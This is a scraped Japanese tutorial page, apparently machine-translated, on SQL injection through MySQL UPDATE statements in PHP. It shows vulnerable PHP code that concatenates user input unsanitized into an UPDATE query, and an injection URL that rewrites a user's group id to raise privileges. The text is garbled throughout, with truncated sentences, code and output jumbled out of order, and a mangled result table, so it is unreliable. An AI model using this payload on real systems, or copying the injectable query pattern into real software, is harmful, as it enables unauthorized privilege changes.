ホームページ >バックエンド開発 >PHPチュートリアル >UPDATE インジェクションの 2 つのモード (mysql+php)_PHP チュートリアル
UPDATE インジェクションの 2 つのモード (mysql+php)_PHP チュートリアル
- WBOYオリジナル
- 2016-07-13 17:34:10826ブラウズ
1. テスト環境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
アパッチ 1.3.33
2. データベース構造をテストします。
-----開始---
-- データベース: `テスト`
--
-------------------------------------------------- --------
--
-- テーブル構造 `userinfo`
--
テーブル `userinfo` を作成します (
`groudid` varchar(12) NOT NULL デフォルト '1'、
`user` varchar(12) NOT NULL デフォルトの 'heige'、
`pass` varchar(122) NOT NULL デフォルト '123456'
) エンジン=MyISAM デフォルト文字セット=latin1;
--
-- テーブル `userinfo` 内のデータをエクスポートします
--
INSERT INTO `userinfo` VALUES ('2', 'heige', '123456');
------終了------
を構築することでそれを達成することです。
グループIDを変更する目的:
次に、http://127.0.0.1/test1.php?p=123456,groudid=1 を送信します
mysqlでクエリを実行します。
|
| 不機嫌なユーザー | +--------+----------+----------+ | 123456 | +--------+----------+----------+ セット内の 1 行 (0.01 秒) ユーザーheigeのgroididが2から1に変更されました:) |
|
$dbusername = "ルート";
$dbパスワード = "";
$dbname = "テスト"; mysql_connect($servername,$dbusername,$dbpassword) または die ("データベース接続に失敗しました"); $sql = "update userinfo set pass=’$p’ where user=’heige’";// $result = mysql_db_query($dbname, $sql); $userinfo = mysql_fetch_array($result); エコー " SQLクエリ:$sql "; ?> 「$p は 123456 になるように構築します」を閉じるには、grudid='2 送信します: mysqlクエリ:
|